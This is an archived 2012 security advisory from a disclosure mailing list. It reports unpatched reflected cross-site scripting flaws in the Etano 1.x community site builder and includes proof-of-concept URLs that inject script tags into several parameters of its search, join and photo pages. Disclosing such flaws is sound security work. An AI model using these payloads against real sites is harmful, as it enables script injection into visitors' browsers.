lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 6 Mar 2012 00:55:03 +0800
From: YGN Ethical Hacker Group <lists@...g.net>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>,
  bugtraq <bugtraq@...urityfocus.com>, secalert@...urityreason.com,
  bugs@...uritytracker.com, vuln <vuln@...unia.com>, vuln@...urity.nnov.ru,
  news@...uriteam.com, moderators@...db.org,
  submissions@...ketstormsecurity.org, submit@...ecurity.com,
  oss-security@...ts.openwall.com
Subject: Etano 1.x <= Multiple Cross Site Scripting Vulnerabilities

1. OVERVIEW

Etano 1.x versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

The community builder script we provide - Etano - was built entirely
based on requests from customers of our previous dating package
(Dating Site Builder). Almost every feature ever requested was built
into Etano to help you build a better site for your community members.
You can use Etano to start up a dating site, a social networking site,
a classifieds site or any other type of site involving groups of
people, companies, products.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized upon submission to
join.php, search.php, photo_search.php and photo_view.php , which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

Tested in 1.x versions (1.20-1.22)


5. PROOF-OF-CONCEPT/EXPLOIT

URL: http://localhost/etano/join.php
Method: POST
Vulnerable Parameters: user, email, email2, f17_zip, agree

------------------------------------------------------------------------------------------------

URL: http://localhost/etano/search.php
Method: GET
Vulnerable Parameters: QUERY STRING, st, f17_city,f17_country ,
f17_state, f17_zip, f19, wphoto, search, v, return


http://localhost/etano/search.php?'"><script>alert(/XSS/)</script>

http://localhost/etano/search.php?st='"><script>alert(/XSS/)</script>

http://localhost/etano/search.php?f17_city='"><script>alert(/XSS/)</script>&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country='"><script>alert(/XSS/)</script>&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state='"><script>alert(/XSS/)</script>&f17_zip=3&f19=0&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip='"><script>alert(/XSS/)</script>&f19=0&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19='"><script>alert(/XSS/)</script>&st=basic&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st='"><script>alert(/XSS/)</script>&wphoto=1

http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto='"><script>alert(/XSS/)</script>

http://localhost/etano/search.php?search='"><script>alert(/XSS/)</script>&v=g

http://localhost/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6&v='"><script>alert(/XSS/)</script>

http://localhost/etano/search.php?st=xss"><script>alert(/XSS/)</script>&user=unknown

------------------------------------------------------------------------------------------------

URL: http://localhost/etano/photo_search.php
Method: GET
Vulnerable Parameters: QUERY STRING, st, return

http://localhost/etano/photo_search.php?'"><script>alert(/XSS/)</script>

http://localhost/etano/photo_search.php?st='"><script>alert(/XSS/)</script>

------------------------------------------------------------------------------------------------

URL: http://localhost/etano/photo_view.php
Method: GET
Vulnerable Parameter: return

http://localhost/etano/photo_view.php?photo_id=1&return="><script>alert(/XSS/)</script>


6. SOLUTION

The vendor hasn't released the fixed yet.


7. VENDOR

Datemill
http://www.datemill.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-21: notified vendor
2012-03-05: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Betano_1.2.x%5D_xss


#yehg [2012-03-05]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ